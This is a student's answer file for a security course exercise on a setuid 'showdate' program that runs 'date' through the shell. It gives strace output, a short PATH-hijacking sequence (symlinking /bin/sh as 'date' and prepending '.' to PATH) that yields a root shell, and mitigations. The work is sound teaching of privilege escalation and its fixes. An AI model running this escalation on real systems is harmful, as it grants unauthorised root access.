CamilStaps-s4498062-Assignment-2/ex1/ex1.txt


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

a
    Using strace -feprocess ./showdate we see the following interesting calls:
        execve("/bin/sh", ["sh", "-c", "date"], [/* 37 vars */])
        execve("/bin/date", ["date"], [/* 37 vars */])

b
    $ ln -s /bin/sh date
    $ export PATH=.:$PATH
    $ ./showdate
    # id
    uid=0(root) gid=0(root) groups=0(root),27(sudo),1001(camil)

c
    - Simply don't use execve for something as simple as this.
    - The currently used system call is:
        execve("/bin/sh", ["sh, "-c", "date"], [/* 37 vars */])
      This could be changed to:
        execve("/bin/date", ...)
      A nonprivileged user cannot change /bin/date.
    - Drop privileges before executing execve.